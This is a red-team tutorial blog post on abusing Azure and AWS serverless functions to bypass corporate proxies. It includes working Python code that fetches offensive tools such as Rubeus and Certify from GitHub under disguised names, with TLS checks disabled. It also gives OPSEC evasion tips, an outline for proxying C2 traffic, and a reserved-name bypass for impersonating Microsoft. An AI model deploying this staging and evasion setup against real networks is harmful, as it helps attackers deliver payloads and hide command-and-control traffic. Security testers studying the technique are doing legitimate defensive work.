Skip to content

Servers are overrated – Bypassing corporate proxies (ab)using serverless for fun and profit.

Last updated on 22 October 2021

Serverless functions is nothing new, AWS Lambda functions exist since 2014, Microsoft followed in 2016, however for many of us it’s still a magic box and nothing much has been done with it so far in terms of exploring offensive capabilities of this functionality (that I know of at least).

I have some interesting ideas on this topic, and I might release several blogs about having “fun” with serverless. In this blogpost I thought a nice proof of concept would be to utilize serverless functionality to proxy arbitrary content from another website and we’ll also be (ab)using azure functions to proxy C2 traffic.

As this will be a rather lengthy post, I split up the sections in Azure and AWS where applicable. the Azure approach will be prefixed with AZURE whereas AWS will have sections prefixed with AWS in case you want to ctrl+f to find relevant information for you.

This blogpost has code examples, all of which can be found on my GitHub.
The serverless applications themselves which serve as examples used in this blogposts will no longer be active at time of release to avoid having you people ruin my credit card bill by spamming requests to my serverless functions :).

Repo: https://github.com/jfmaes/FunWithServerless

Pro tip: if the images are to small on computer, right click open in new tab for better quality.

WTF is serverless?

So glad you asked Timmy! AWS and Azure (and probably other cloud providers as well) have a functionality to invoke code ‘dynamically’ without you having to provide infrastructure to run it on. In reality of course, the function itself still runs on a server usually in the form of a container that spins up to run your code and then happily dies afterwards again. Of course it is a bit more complex than that but for the sake of this blogpost, that is all you need to know about it honestly.

Why should I care

A lot of technology is moving/moved to the cloud. It is hard for companies to block access to these cloud services completely. By leveraging the cloud ourselves, in this case using serverless, we have a good chance of bypassing corporate outbound internet restrictions.


Decisions decisions… Runtimes

Now that we know what serverless is, we have an important first design decision to make! Which runtime are we going to use? AWS and Azure both come with a ton of supported languages to write our serverless code in, so which one do we pick?

There is some overlap between supported languages (thankfully) as that means that we don’t have to port our serverless code from one language to another to run on either Azure or AWS. For simplicities sake, I have chosen to create the binary proxy proof-of-concept in Python, as I feel like most readers are at least in some way, shape or form familiar with it.

If you do not have python installed on your computer that you want to develop your python function, you’d best install it 🙂

Press F12 for 1337 hax.

Enough BS, let’s get coding! – Use case 1: Content Proxying.

For the remainder of the blog, I will split the sections into an Azure section and an AWS section and finish it off with a conclusion. The reason being that even though Azure and AWS both support Python, they both have some differences in the approach which means that the code itself is not an exact 1 to 1 mapping.

The main difference is that Azure and AWS treat package dependencies differently, and that AWS needs an additional “part” (API GateWay) to make your serverless function accessible.

Before we dive into that though, let’s first discuss what our Function will do:

Our application will exist of two main components:

  1. A JSON Watchlist called Bouncer which contains the “name” of the content we want to proxy and where to find it (url)
  2. A Python script that will make the request and return the content back to us if the Bouncer lets you in.

All in all quite straightforward:

  1. You invoke the serverless function and pass it the name of what you want to fetch.
  2. The serverless function checks with the bouncer if the thing you want to fetch is on the list or not
  3. If it is on the list, the requests get passed on the the actual destination (location of the proxy target)
  4. The proxy target gets fetched by the serverless function

  5. The serverless function returns the data to the user.

For some extra fun, the name is obviously arbitrary, so imagine that you are fetching a C2 payload you could call it something like RedTeamerDotTipsRules, as long as your backend mapping maps RedTeamerDotTipsRules to your C2 payload it’s all good.

AZURE: Creating our Azure environment

Creating an Azure account is actually completely free, but you will need a valid credit card to verify your identity ¯\_(ツ)_/¯.
To develop Azure Functions as easily as possible, I highly recommend getting Visual Studio Code and the Azure Functions plugin and Python plugin for it.

Once installed you will see a new symbol resembling the letter A in your toolbar on the left, clicking it will take you to the Azure extension tab in your Visual Studio Code, from there you can sign up for a new account if you haven’t done so already, or sign in to an existing one. Once signed in you can Create New Project… :

VSCode will then ask you the folder in which you want to put the project and the projects runtime (language). Select the folder you desire and select Python. VSCode will then enumerate your python installations and give you the option of which interpreter you want to use, pick the one applicable to you.

VSCode will now ask you which Azure function template you want to use, as we would like to be able to call our serverless function upon a HTTP event, we will use the HTTP Trigger template:

VSCode will now ask you to name your function, name it as you please, in the example our function will be called ContentProxy.
As a final question VSCode will ask you about the authorization method for your function. If you would like to learn more about Function Auth, feel free to read the documentation here:

https://docs.microsoft.com/en-us/azure/azure-functions/functions-bindings-http-webhook-trigger?tabs=python#configuration

For now let’s go with anonymous authorization. Now the Azure extension will create boilerplate code for you which should look as follows:

When you installed the Azure extension normally Azure Core tools should be automatically installed as well, the cool thing about this is that you can run and debug your azure function locally before shipping it off to the cloud if you go to the debug/execute tab on the left and then click the Attach to green play button, your function will run locally:

Browsing to the URL results in:

Congratulations your first (quite boring) Azure function is born!

Adding the special Sauce

Let’s start with creating our Bouncer.
Add a new file to your project and let’s call it watchlist.json
For our PoC we are going to rely upon one of my awesome colleagues Melvin Langvik aka @Flangvik and leverage his sharpcollection of precompiled goodies.

An example of a watchlist.json file can be as follows:

{
    "Tools": [
      {
        "name": "RedTeamerDotTipsRules",
        "url": "https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_Any/Rubeus.exe"
      },
      {
        "name": "TrustedSecForTheWin",
        "url": "https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_Any/Certify.exe"
      }
    ]
  }

Now that we have our watchlist configured, we need to code the logic that will interpret this watchlist file and do the magic:



import json
import requests
import pathlib


bouncer_file = pathlib.Path(__file__).parent / 'watchlist.json'

def get_tool_information(toolName):
    bouncer = open(bouncer_file)
    data = json.load(bouncer)
    for tool in data["Tools"]:
        if toolName in tool["name"]:
            return tool
    raise Exception("{0} not found in the watchlist, please add it.".format(toolName))


def get_tool_url(toolName):
    toolinfo = get_tool_information(toolName)
    return toolinfo["url"]


def fetch_tool(url):
    req = requests.get(url, verify=False)
    return req.content


And then we need to call all this good stuff in our __init__ file:

import logging
import pathlib
import azure.functions as func
from . import contentproxy

watchlist_file = pathlib.Path(__file__).parent / 'watchlist.json'

def main(req: func.HttpRequest) -> func.HttpResponse:
    toolName = ""
    logging.info('Python HTTP trigger function processed a request.')
    try:
        req_body = req.get_json()
    except ValueError:
        pass
    else:
        toolName = req_body.get('name')     
    if toolName:
        url = contentproxy.get_tool_url(toolName)
        tool_data = contentproxy.fetch_tool(url)
        return func.HttpResponse(tool_data) 
       

And to wrap it all up, Azure is kind enough to automatically install python packages that we define in our requirements.txt file – if any of the AWS engineers are reading this, TAKE NOTE:

# DO NOT include azure-functions-worker in this file
# The Python Worker is managed by Azure Functions platform
# Manually managing azure-functions-worker may cause unexpected issues

azure-functions
requests
configparser
pathlib

Testing our proxy

As we are using POST requests and not GET requests, testing is not as easy as just browsing to our local host function. In my opinion the easiest way to test REST API’s is using a tool called Postman – We will test our proxy by sending a POST request with one of the toolnames that we added to our watchlist.json and as expected, we get binary data back to us (notice the MZ magic bytes indicating a PE file):

Now that we know that our function works, we can kick it off to the cloud:

Give your application a benign name, I called my function app sentinelcarbonstrike

now that it got kicked to the cloud lets see if our app still works as expected let’s send a POST request to our sentinelcarbonstrike:

Seems to work properly 😉

AWS: Setting up the AWS environment

As I already hinted earlier in this blogpost, AWS and Azure don’t really use the same design principles when it comes to building serverless functions.
Azure gives you a browseable URL out of the box under the form of *.azurewebsites.net

AWS on the other hand, does not do that automatically. You need a second service in AWS to help you expose your function to the world in the form of an API GateWay.

The second major difference between Azure and AWS is that AWS does not give you the option to add a requirements.txt file for python deployments that they will automatically install for you in their runtime environment. Instead, they have a python environment that comes bundled with several well known python packages. The best documentation I have seen about this is actually not from AWS themselves, but on GitHub:

https://gist.github.com/gene1wood/4a052f39490fae00e0c3

If you want to create your own runtime environment, that is also a possibility. In case you want to go down that rabbit hole here is a good place to start:

https://docs.aws.amazon.com/lambda/latest/dg/python-package.html#python-package-dependencies

https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html

I myself did not went down that rabbit hole and simply modified my PoC I had for Azure to play nice with AWS.

AWS also has a Visual Studio Code extension, but for me that didn’t really do the trick as smoothly as Azure’s extension does. So for this one, I did some manual work in the GUI of AWS itself. Feel free to follow your own path and use API’s or extensions as you see fit.

The first thing I did was create my proxy lambda function

I copied over the boilerplate code to my Visual Studio Code:

And I then proceeded to create my API Endpoint using AWS API Gateway:

set your integration to your lambda you created:

Then setup routing, for this blogpost I selected ANY, but you can also make a distinction between protocols if you want to do redirection based on HTTP Verb. (exercise to the reader, it involves creating a new redirector lambda and adding a second integration to your API GateWay)

Then do the familiar next, next, next because who reads documentation anyway and you’ll get a random AWS generated endpoint that points to your lambda.

Let’s verify if it works:

Great we got a totally legit looking url that we can use to proxy binaries!

This Is Fine creator explains the timelessness of his meme - The Verge

Now we need to modify our boilerplate lambda:

I discovered that, in order for AWS to correctly retrieve the watchlist json, I needed to create an empty __init__,py thanks to this GitHub gem:
https://gist.github.com/gene1wood/06a64ba80cf3fe886053f0ca6d375bc0

additionally lambda doesnt really play nice with binary data, so I had to adapt the code to return binary data. So that’s the only datatype that I support in this PoC code, with minor adjustments you can get it to work with other datatypes as well of course.

The file structure looks like this:

As mentioned, __init__.py is empty.
Contrary to what we did in Azure functions, the requests library is not supported by the python runtime in AWS Lambda by default, but urllib3 is so I revised the code to take that into consideration:

binproxy.py

import json
import ssl
import urllib3
import pathlib


watchlist_file = pathlib.Path(__file__).parent / 'watchlist.json'

def get_tool_information(toolName):
    watchlist = open(watchlist_file)
    data = json.load(watchlist)
    for tool in data["Tools"]:
        if toolName in tool["name"]:
            return tool
    raise Exception("{0} not found in the watchlist, please add it.".format(toolName))


def get_tool_url(toolName):
    toolinfo = get_tool_information(toolName)
    return toolinfo["url"]


def fetch_tool(url):
    https = urllib3.PoolManager(cert_reqs = ssl.CERT_NONE)
    urllib3.disable_warnings()
    req = https.request('GET',url)
    return req.data

lambda_function.py – as you can see, hard coded octet stream header here (required otherwise API Gateway farts).

import json
import base64
from . import binproxy
def lambda_handler(event, context):
    try:
        body = json.loads(event['body'])
        toolName = ""
        toolName = body["name"]
        if not toolName:
            return "could not process request."
        url = binproxy.get_tool_url(toolName)
        bin_data = binproxy.fetch_tool(url)
        return{
            'headers': { "Content-Type": "application/octet-stream" },
            'statusCode': 200,
            'body': base64.b64encode(bin_data).decode('utf-8'),
            'isBase64Encoded': True
            }
    except Exception as e:
        return e

For me, pushing to AWS using the VSCode plugin isn’t an option, so I use the GUI. You need to ZIP up your lambda function before you can upload it.
Testing, this time with lambda instead of azure functions 🙂

A quick note on OPSEC

I already give a hint on changing the names of the tooling that you want to proxy to something benign. In this example I am also specifically filtering on POST requests so the parameter of the requested tool isn’t shown in the URL directly.

Obviously you can do more shenanigans such as redirecting all unsupported HTTP requests and all requests that try to fetch something not on the bouncer list. That will be an exercise to the reader, else what’s the fun? 🙂

Enough BS, let’s get coding! – Use case 2: Serverless for C2 (AZURE only)

There has been countless blogposts about exotic methods to get a C2 channel up and running. My goto used to be domain fronting, but that is now (as good as) dead. Several other good options exist such as using cloudflare workers or firebase. And Azure has also been scrutinized already as shown here https://www.trustedsec.com/blog/azure-application-proxy-c2/.

I wanted to explore if we can use serverless in AWS and Azure for this.
I quickly realized using AWS for this is not worth it as you don’t get a custom domain assigned to you based on your function. So using AWS Lambda as a C2 proxy would be exactly the same as just using cloudfront itself, so I abandoned that avenue pretty quickly.

However when exploring the avenue for Azure function I encountered something quite interesting, which for me looks and feels like a security vulnerability, which I (ethical person that I am) reported to Microsofts Research Center. I received the following email back from them:

I am very curious how long it will take from the release of this blogpost, to a silent patch from Microsoft’s side without of course giving me any credit for my finding :).
I will agree, it is not a very high impacting vulnerability from Microsoft’s side, but the implications are pretty big if adversaries start impersonating Microsoft, have fun filtering those logs out if you get popped….

Much like using Azure CDN, I was curious to see if I could use “reserved words” basically, a blacklist that Microsoft has for security reasons, one of the reserved words is Microsoft.
When trying it using Visual Studio Code I got this nice little pop up:

Alright cool, that works as intended. To my surprise however, when trying the same thing in the GUI…

I got a nice green checkmark! maybe that’s just client side though and the function wont work when we actually try to generate it.

I chose javascript (node) as my stack and picked the latest version.

Important: I chose Linux as the host for my function app, not windows (which is ticked by default in the GUI).

To my surprise, it seem to work just fine.

However, I could not deploy to it as apparently, when you create a function manually in the GUI, it doesn’t configure the function properly as it doesn’t provide the ‘AzureWebJobsStorage’ automatically (Deploying using VSCode does that for you)

After some investigation, I figured out how to fix that issue.
We need to create a new storage account in our resource group:

I picked Zone redundant storage, not sure if that is required or not, but that seems to be the default that gets pushed if you deploy using the VSCode extension so I just mimicked those settings.

Now we need to bind our function to this storage account, we can do that by going to the access keys tab in our storage account:

Copy the connection string:

And place that as a new variable in our function configuration calling it AzureWebJobsStorage:

I now created a new Azure Application using the Azure extension in VSCode and chose Node and HTTP trigger.

I changed the source code a little bit (index.js) and called my function totallynotc2traffic

module.exports = async function (context, req) {
    context.log('JavaScript HTTP trigger function processed a request.');

    const name = (req.query.name || (req.body && req.body.name));
    const responseMessage = name
        ? "Hello, " + name + ". This HTTP triggered function executed successfully."
        : "jfmaes was here. it is a bug not a vuln.";

    context.res = {
        // status: 200, /* Defaults to 200 */
        body: responseMessage
    };
}

I then published it to the application and surprise surprise

If you want to setup a complete proxy, I recommend following these steps:

https://fortynorthsecurity.com/blog/azure-functions-functional-redirection/

I tried to work something out in node.js but failed 😛 (never used node before and could not get http-proxy-middleware and azure-function-express to play nicely together) would be a nice follow up blogpost if someone wants to have a swing at it.

Conclusion:

Serverless is an interesting technology that is underutilized for offensive operations.
Especially combined with automated devops pipelines (looking at you Azure), advanced operators could make some truly evil tradecraft leveraging these technologies.

Bobsburgers Evil GIF - Bobsburgers Evil Laughing - Discover & Share GIFs


Published inTips & Tutorials

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *